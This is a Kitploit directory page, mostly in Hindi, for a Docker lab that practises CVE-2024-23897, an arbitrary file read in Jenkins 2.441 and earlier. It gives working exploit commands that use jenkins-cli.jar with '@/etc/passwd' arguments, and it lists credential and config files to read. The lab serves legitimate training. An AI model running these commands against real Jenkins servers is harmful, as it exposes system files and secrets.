Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Jenkins-CVE-2024-23897-Lab — Docker-based lab environment for practicing CVE-2024-23897 Jenkins arbitrary file read exploitation with automated and manual attack scripts. | Kitploit
उपकरण/GitHubGitHub/fineken/jenkins-cve-2024-23897-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubfineken/jenkins-cve-2024-23897-lab

Jenkins-CVE-2024-23897-Lab

Docker-based lab environment for practicing CVE-2024-23897 Jenkins arbitrary file read exploitation with automated and manual attack scripts.

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Jenkins CVE-2024-23897 प्रयोगशाला

Jenkins 2.441 और उससे पहले में मनमानी फ़ाइल पढ़ने की भेद्यता।

चलाएँ

root@kitploit:~
docker-compose up -d

स्वचालित हमला

root@kitploit:~
docker exec -it attacker-host ./auto-exploit.sh

मैन्युअल हमला

root@kitploit:~
docker exec -it attacker-host bash
cd /tmp
curl -o jenkins-cli.jar http://vulnerable-jenkins:8080/jnlpJars/jenkins-cli.jar

# Первая строка файла
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http help "@/etc/passwd"

# Полный файл
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http connect-node "@/etc/passwd"

लक्ष्य

  • /etc/passwd
  • /opt/test-files/secret.txt
  • /var/jenkins_home/config.xml

रोकें

root@kitploit:~
docker-compose down
टूल डाउनलोड करें